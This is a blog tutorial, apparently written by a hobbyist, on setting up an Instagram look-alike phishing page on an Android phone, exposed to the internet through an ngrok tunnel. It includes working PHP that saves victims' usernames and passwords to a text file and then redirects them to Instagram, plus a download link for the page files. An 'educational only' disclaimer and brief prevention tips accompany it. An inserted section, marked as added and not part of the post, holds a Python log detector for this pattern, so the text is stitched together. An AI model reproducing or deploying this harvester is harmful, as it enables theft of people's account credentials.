Phishing is a kind of social engineering attack often used to steal user data, including login credentials. It happens when an attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message. The recipient is then tricked into clicking a malicious link, which might cause the installation of malware and reveal their sensitive data.
So today's post will be about a phishing attack. Before getting started, I hope you have installed ngrok in your Termux application, because it plays a crucial role in this topic.
NOTE: This post is for educational purposes only. Do not try to misuse this. I have done all the tests on my phone.
Requirements:
1. Termux application on an Android phone
2. Kick Web Server
3. Ngrok
Getting Started:
First you have to set up a web server in which you can store your PHP, HTML and CSS files. To do this I am using the Kick Web Server application for Android. It has phpMyAdmin built in. Everything is preconfigured and it is easy to install.
There is a folder in internal storage named htdocs. This is the folder in which you have to keep your PHP and HTML files.
Step 1 : Turn on the Kick Web Server.
Step 2 : See the image below. Click on the icon button where the arrow is pointing and check that localhost is working properly.
Step 3 : When localhost is running properly, open the Termux application.
Step 4 : Type ./ngrok http 8080 and you will get a screen like this. Basically, ngrok will create a secure tunnel between two parties.
Step 5 : Now open the link in your browser. The link is provided by ngrok. Copy that link and paste it into your browser.
After completing these 5 steps you have your own web server in which you can store your files in the htdocs folder. You can even access those files through the internet using the ngrok link. The final part is how to make a page so that the victim clicks on that particular link and reaches your page.
Login.php
<?php
file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://instagram.com');
exit();
?>
Index.php
<?php
header('Location: login.html');
exit();
?>
Here I have made an Instagram look-alike phishing page. You can download the two files. Click here to download:-https://my.pcloud.com/publink/show?code=XZRrh17Z8YnvGNfCXwVlTvLldGWaYREWiiRX
When you enter the username and password, it redirects to the Instagram login page, but it stores the username and password in the usernames.txt file. As you can see, before redirecting to the Instagram page it stores the values in a text file.
6 ways to prevent phishing attacks:
- Use anti-malware software and keep it (along with system patches) up to date.
- Use multi-factor authentication.
- Never enter sensitive information in a pop-up window or on any unauthorised website.
- Check the source of information in incoming mail.
- Never go to your bank's website by clicking on links included in emails.
- Never click on hyperlinks in email or on any other social media platform.
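On the defender's side, the store-then-redirect behaviour described above leaves a recognisable trace: a POST to a host that is not the brand's, answered with a redirect to the real brand domain. The following Python check is an added example, not code from the original post; it assumes JSON proxy records from a TLS-inspecting proxy with hypothetical field names (client, method, url, status, location), and the brand list, tunnel suffixes and sample records are constructed for illustration.

```python
import json
from urllib.parse import urlsplit

# Assumption: domains treated as the genuine brand in this environment.
BRAND_DOMAINS = {"instagram.com"}
# Assumption: hostname suffixes of public tunnelling services such as ngrok.
TUNNEL_SUFFIXES = (".ngrok.io", ".ngrok-free.app", ".ngrok.app")
REDIRECTS = (301, 302, 303, 307, 308)

def registrable_match(host, domains):
    """True if host equals one of the domains or is a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)

def score_event(event):
    """Return (score, reasons) for one proxy record (a dict)."""
    reasons = []
    req = urlsplit(event["url"])
    loc = urlsplit(event.get("location") or "")
    # Only form submissions to hosts outside the brand are of interest.
    if event["method"] != "POST" or registrable_match(req.hostname, BRAND_DOMAINS):
        return 0, reasons
    if event["status"] in REDIRECTS and registrable_match(loc.hostname, BRAND_DOMAINS):
        reasons.append("POST to non-brand host redirected to brand domain")
    if (req.hostname or "").lower().endswith(TUNNEL_SUFFIXES):
        reasons.append("destination is a public tunnel hostname")
    return len(reasons), reasons

def find_suspects(lines, threshold=1):
    """Parse JSON log lines and return (client, url, reasons) for each hit."""
    hits = []
    for line in lines:
        event = json.loads(line)
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event["client"], event["url"], reasons))
    return hits

# Constructed sample records, not real traffic.
SAMPLE_LOG = [
    '{"client":"10.0.0.12","method":"POST","url":"https://a1b2c3.ngrok.io/login.php","status":302,"location":"https://instagram.com"}',
    '{"client":"10.0.0.15","method":"POST","url":"https://www.instagram.com/accounts/login/","status":200,"location":null}',
    '{"client":"10.0.0.20","method":"GET","url":"https://a1b2c3.ngrok.io/login.html","status":200,"location":null}',
    '{"client":"10.0.0.31","method":"POST","url":"https://shop.example.org/cart","status":302,"location":"https://shop.example.org/checkout"}',
]

if __name__ == "__main__":
    for client, url, reasons in find_suspects(SAMPLE_LOG):
        print(client, url, "; ".join(reasons))
```

A hit identifies the client whose credentials were probably submitted, so the account's password reset and session revocation can start from the log line.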
Till Now Good Bye and Take Care.
Author: ADITYA YADAV
I am a blogger and Tech Geek and hacking lover. He loves to keep eyes on Hacking tips and tricks. He is a night time tech blogger."(Blogger by Passion)"